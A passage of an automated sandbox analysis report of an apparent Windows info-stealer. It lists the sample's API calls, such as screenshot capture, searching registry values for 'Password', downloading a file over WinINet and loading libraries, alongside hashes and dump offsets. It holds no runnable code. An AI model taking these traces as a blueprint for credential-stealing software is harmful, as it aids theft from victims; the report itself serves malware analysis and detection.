                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: de8f7a0bac618f58a0e5a7622b03ff3d6a6aeb473c415833d191dda269bf9bd2
                                    • Instruction ID: 0934c0141ad0eb9b4b329ebdd22e37d2b1cda63759bbf2af7f244913d831ab94
                                    • Opcode Fuzzy Hash: de8f7a0bac618f58a0e5a7622b03ff3d6a6aeb473c415833d191dda269bf9bd2
                                    • Instruction Fuzzy Hash: 14513E71A01659ABDB10DFE5CD88AAEBBF9FF45700F044129E905E3291DF34AE06CB50
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008E4264
                                    • GetDesktopWindow.USER32 ref: 008E426E
                                    • GetWindowRect.USER32(00000000,?), ref: 008E427C
                                    • SelectObject.GDI32(00000000,00000000), ref: 008E42B3
                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 008E4335
                                    • GlobalLock.KERNEL32(?), ref: 008E4340
                                    • GlobalSize.KERNEL32(?), ref: 008E434F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID: S
                                    • API String ID: 1264946473-3841253601
                                    • Opcode ID: 53c847b2b306cfabf06ebbe8063bd0a9ca174290acaae6a81b11a7d130696c92
                                    • Instruction ID: 1b01360b1128ba18ab3816da417293fe118e9c980edb3833cd81159cf52621e1
                                    • Opcode Fuzzy Hash: 53c847b2b306cfabf06ebbe8063bd0a9ca174290acaae6a81b11a7d130696c92
                                    • Instruction Fuzzy Hash: DB510571214300AFD710EFA8DC89EABBBB9FB89710F00491DF985C3250DA74E906CB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF134
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF162
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008DF176
                                    • lstrlen.KERNEL32(00000000), ref: 008DF185
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 008DF1A3
                                    • StrStrA.SHLWAPI(00000000,?), ref: 008DF1D1
                                    • lstrlen.KERNEL32(?), ref: 008DF1E4
                                    • lstrlen.KERNEL32(00000000), ref: 008DF202
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF24F
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 9b0a8a9b460e7be4506b89d6075fceda384dd99a2cf3a1a9634e6e78985508f1
                                    • Instruction ID: 6265bcfae7719a6bbd537530e04de8771db69941aa2e88818c3b01bb46a40180
                                    • Opcode Fuzzy Hash: 9b0a8a9b460e7be4506b89d6075fceda384dd99a2cf3a1a9634e6e78985508f1
                                    • Instruction Fuzzy Hash: 82518C35A10A059FCB21ABB8CC49F6A7BB4FF81304F144229EA46DB352DE30DC069791
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00539288,00AF9BD8,0000FFFF), ref: 008CA086
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CA0B3
                                    • lstrlen.KERNEL32(00AF9BD8), ref: 008CA0C0
                                    • lstrcpy.KERNEL32(00000000,00AF9BD8), ref: 008CA0EA
                                    • lstrlen.KERNEL32(008F5214), ref: 008CA0F5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA112
                                    • lstrcat.KERNEL32(00000000,008F5214), ref: 008CA11E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA144
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CA14F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CA174
                                    • SetEnvironmentVariableA.KERNEL32(00539288,00000000), ref: 008CA18F
                                    • LoadLibraryA.KERNEL32(0053D7B0), ref: 008CA1A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 3fa24ad455db48cdc7fad00697d71d8e1db0510d0d6d0aa5e04d71d064290cdf
                                    • Instruction ID: 2bec9a2be6e05128721e6a298aa01cf16a302710a44fdc115c64b45fe8b11c7f
                                    • Opcode Fuzzy Hash: 3fa24ad455db48cdc7fad00697d71d8e1db0510d0d6d0aa5e04d71d064290cdf
                                    • Instruction Fuzzy Hash: 3F916B31600A189FDB24DBE8DC84F7636B5FB54709F44452DA906CB3A1EF79C982CB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DC9A2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DC9D1
                                    • lstrlen.KERNEL32(00000000), ref: 008DC9FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DCA32
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008DCA43
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 83cabad356f587cd281ab4a9ce16d724bd43c9828febd8c52e9bcb300dbf8847
                                    • Instruction ID: b997442bddda72c7bfdfa1eaba08f17bfa0ebd84295b2d6b7ec106ca22559ee9
                                    • Opcode Fuzzy Hash: 83cabad356f587cd281ab4a9ce16d724bd43c9828febd8c52e9bcb300dbf8847
                                    • Instruction Fuzzy Hash: FC61717190171AABDB10EFB48845EAE7BB8FF09350F04026AE841E7351DB74D905CBA1
                                    APIs
                                    • lstrcat.KERNEL32(?,0053E4C0), ref: 008DE12D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DE157
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE18F
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE19D
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1B8
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1CC
                                    • lstrcat.KERNEL32(?,0052B680), ref: 008DE1E0
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1F4
                                    • lstrcat.KERNEL32(?,0053D9F0), ref: 008DE207
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE23F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DE246
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 5aaeb3aca2a37061d9167a54d5aaaa6ff64c41b436adfef116c39993070829cd
                                    • Instruction ID: 7ad953688b78a7273114c21550ee16ca2fed8e132cbf2707cef22feca9978e28
                                    • Opcode Fuzzy Hash: 5aaeb3aca2a37061d9167a54d5aaaa6ff64c41b436adfef116c39993070829cd
                                    • Instruction Fuzzy Hash: 8E616A7591011CABCB54EBA8C944BEEB7B8FF88300F1049A9A549E7391DE74AF85CF50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6A3F
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C6A6C
                                    • StrCmpCA.SHLWAPI(?,0053E908), ref: 008C6A8A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008C6AAA
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008C6AC8
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008C6AE1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008C6B06
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008C6B30
                                    • CloseHandle.KERNEL32(00000000), ref: 008C6B50
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6B57
                                    • InternetCloseHandle.WININET(?), ref: 008C6B61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID:
                                    • API String ID: 2500263513-0
                                    • Opcode ID: 98003146becdb06f56e017f2e0595d5c68193ee94076b6ef1f0ba9ce843cc2bb
                                    • Instruction ID: 38f5d32831ee38db90ff230c2c3dfb65d609e738e16e3d0e34ac00aa9d81cf7b
                                    • Opcode Fuzzy Hash: 98003146becdb06f56e017f2e0595d5c68193ee94076b6ef1f0ba9ce843cc2bb
                                    • Instruction Fuzzy Hash: 9B415C71A00219ABDB20DBA4DC45FAE77B8FB44704F108568FA05E7280EF74EE55CBA4
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CBD0F
                                    • lstrlen.KERNEL32(00000000), ref: 008CBD42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CBD6C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CBD74
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CBD9C
                                    • lstrlen.KERNEL32(008F509C), ref: 008CBE13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 3b84b46516798e7f6e113d98cc562c133186ccf94afc699f412a195d0ba9bf6d
                                    • Instruction ID: 58f77eeafc733bd6a20c7ffa654edf539a531387b01b2bdfdad4a43f239379fb
                                    • Opcode Fuzzy Hash: 3b84b46516798e7f6e113d98cc562c133186ccf94afc699f412a195d0ba9bf6d
                                    • Instruction Fuzzy Hash: 42A15B30A01A058FCB24DFA8D94AFAABBB4FF44705F18806DE509D72A1DB35DC56CB91
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5F5A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5F79
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 008E6044
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 008E60CF
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E6100
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: a9aeb4e0ade64946c587388eb8cd0a7b87650f7f3bb05ab4c6f683327dedb53e
                                    • Instruction ID: bc8826a713b7fbeec23f2bd21ac67e9d2bf95607628edd82f613fa7dea47d431
                                    • Opcode Fuzzy Hash: a9aeb4e0ade64946c587388eb8cd0a7b87650f7f3bb05ab4c6f683327dedb53e
                                    • Instruction Fuzzy Hash: A061B330700998DBDB18CF5EC8D496EB7B6FF96308B244919E492D7381EB31ED908B95
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE18F
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE19D
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1B8
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1CC
                                    • lstrcat.KERNEL32(?,0052B680), ref: 008DE1E0
                                    • lstrcat.KERNEL32(?,?), ref: 008DE1F4
                                    • lstrcat.KERNEL32(?,0053D9F0), ref: 008DE207
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE23F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DE246
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: 8dfbeaa49c2940031df5a32b884813a4727770d81940ff8c02f1e3dddc840d4a
                                    • Instruction ID: 3e550a5da38ec65a88b6856c0fa6af08f2390d391c01f109dfb27c0813ab7218
                                    • Opcode Fuzzy Hash: 8dfbeaa49c2940031df5a32b884813a4727770d81940ff8c02f1e3dddc840d4a
                                    • Instruction Fuzzy Hash: 07415A71910518ABCB14EBA8CC48BEE77B8FF48300F1046A9B959D7291DE34DE868F91
                                    APIs
                                      • Part of subcall function 008C7710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008C7745
                                      • Part of subcall function 008C7710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008C778A
                                      • Part of subcall function 008C7710: StrStrA.SHLWAPI(?,Password), ref: 008C77F8
                                      • Part of subcall function 008C7710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C782C
                                      • Part of subcall function 008C7710: HeapFree.KERNEL32(00000000), ref: 008C7833
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008C79D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C79FD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 008C7A0F
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C7A30
                                    • wsprintfA.USER32 ref: 008C7A50
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C7A79
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C7A87
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008C7AA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
